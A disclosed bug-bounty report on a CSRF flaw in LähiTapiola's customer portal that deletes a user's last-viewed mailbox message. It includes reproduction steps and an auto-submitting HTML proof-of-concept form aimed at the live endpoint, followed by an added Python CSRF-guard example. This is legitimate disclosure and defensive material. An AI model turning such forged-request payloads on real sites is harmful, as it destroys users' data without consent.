CSRF allows attacker to delete item from customer's "Postilaatikko"

Disclosed: 2017-02-25 12:15:34 by putsi to localtapiola
Severity: Medium
Vulnerability Details
## Description

If the customer navigates to the CSRF attack page shortly after viewing any message details in the "Postilaatikko", the last item that was viewed by the customer will be deleted. Please see the attached video for an illustration of the bug.

## Steps to reproduce

1. Log in to Lähitapiola.
2. Navigate to "Vakuutukset" --> "Postilaatikko".
3. Open the details page of e.g. the "Asiakastietomuutos" message.
4. (optional) Navigate to any other page of the Lähitapiola website or click the "Takaisin postilaatikkoon" button.
5. Open the CSRF attack page.
6. Notice that the message was deleted due to the CSRF request.

## Proof of concept

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://verkkopalvelu.tapiola.fi/a2/AsiakassalkkuWeb/naytaviestiketju.do">
      <input type="hidden" name="mn" value="p" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
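The PoC above works because the endpoint performs a deletion on a plain top-level GET (the form has no `method`, so the browser submits a GET), requires no request-specific secret, and picks the target from session state ("the last item that was viewed"). The following is an added example, written for this page and not code from the report or from Lähitapiola, of the server-side guard that closes all three gaps: it refuses non-POST requests, checks `Origin` (falling back to `Referer`) against the application's own origin, verifies a per-session synchronizer token in constant time, and only deletes a message the request names explicitly. The `Session`/`Request` classes, the `csrf_token` and `message_id` field names, and the two sample requests are constructed assumptions for illustration.

```python
"""Added example: minimal CSRF guard for a state-changing 'delete message'
handler. Not part of the original report or of the Lähitapiola application;
all names, headers and sample requests are constructed."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Origin taken from the PoC's form action URL; everything else is assumed.
EXPECTED_ORIGIN = "https://verkkopalvelu.tapiola.fi"


@dataclass
class Session:
    """Constructed stand-in for the server-side session."""
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    messages: set = field(default_factory=set)  # ids the user is allowed to delete


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    headers: dict
    form: dict


def csrf_rejection_reason(req: Request, session: Session):
    """Return None if the request may change state, otherwise the reason to refuse it."""
    # 1. State changes only over POST. A GET reachable from a top-level
    #    navigation (exactly what the PoC form sends) must never delete anything.
    if req.method.upper() != "POST":
        return "state-changing request must use POST"

    # 2. Origin check, falling back to Referer. Browsers attach these on
    #    cross-site form submissions, so a foreign page cannot spoof them.
    origin = req.headers.get("Origin")
    if origin is None:
        referer = req.headers.get("Referer")
        if referer:
            parts = urlparse(referer)
            origin = f"{parts.scheme}://{parts.netloc}"
    if origin != EXPECTED_ORIGIN:
        return f"unexpected origin {origin!r}"

    # 3. Synchronizer token bound to the session, compared in constant time.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return "missing or invalid CSRF token"
    return None


def delete_message(req: Request, session: Session):
    """Delete only the message explicitly named in the request, never 'the last viewed one'."""
    reason = csrf_rejection_reason(req, session)
    if reason:
        return (403, reason)
    msg_id = req.form.get("message_id")
    if msg_id is None or msg_id not in session.messages:
        return (400, "message_id missing or not owned by this session")
    session.messages.remove(msg_id)
    return (200, f"deleted {msg_id}")


def demo():
    """Run the guard against a PoC-shaped request and a legitimate one."""
    session = Session(messages={"msg-1", "msg-2"})
    # Constructed request shaped like the PoC: top-level GET, cross-site, no token.
    attack = Request("GET", {"Referer": "https://attacker.example/poc.html"}, {"mn": "p"})
    # Constructed legitimate request from the application's own page.
    legit = Request("POST", {"Origin": EXPECTED_ORIGIN},
                    {"csrf_token": session.csrf_token, "message_id": "msg-1"})
    return delete_message(attack, session), delete_message(legit, session), sorted(session.messages)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Running `demo()` refuses the PoC-shaped request with a 403 before any lookup happens, while the same-origin POST carrying the session's token deletes exactly the message it names. Marking the session cookie `SameSite=Lax` is a useful additional layer, but it does not replace the token check, and none of these checks help if the deletion is still triggered by a GET.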
Report Stats
  • Report ID: 123339
  • State: Closed
  • Substate: resolved
  • Upvotes: 16